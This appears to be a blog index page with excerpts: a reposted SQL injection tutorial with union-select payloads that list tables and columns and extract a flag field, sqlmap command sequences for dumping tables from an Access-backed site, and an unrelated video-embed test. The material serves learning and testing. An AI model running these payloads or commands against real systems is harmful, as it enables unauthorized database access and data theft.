转载自：SQL注入基础整理及Tricks总结-安全客 - 安全资讯平台 (anquanke.com) 前言：对已知的SQL注入手段作了较为全面和详尽的整理，大概是我几年的全部积累了，虽然可能有许多遗漏的地方，但我相信还是很有参考价值的。 本文的注入场景为： 一、基础注入1.联合查询即最常见的union注入： 若前面的查询结果不为空，则返回两次查询的值： 若前面的查询结果为空，则只返回union查询的值： 查完数据库接下来就要查表名： union select group_concat(table_name) from information_schema.tables where table_schema=database()%23 接下来是字段名： union select group_concat(column_name) from information_schema.columns where table_name='table1'%23 得到字段名后查询相应字段： union select flag from table1%23 一个基本 ...

一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 windows: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" Linux: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" (2) 猜解表 windows: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables Linux: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables (3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表) windows: python sqlmap.py -u "http://www.xxx.com/en/CompHonor ...

视频插入测试，代码为： <div style="position: relative; width: 100%; height: 0; padding-bottom: 75%;"><iframe src="//player.bilibili.com/player.html?aid=534928147&bvid=BV1dM41197wb&cid=1307621987&p=1" scrolling="no" border="0" frameborder="no" framespacing="0" allowfullscreen="true" style="position: absolute; width: 100%; height: 100%; left: 0; top: 0;"> </iframe></div> 测试一下上传文件 ...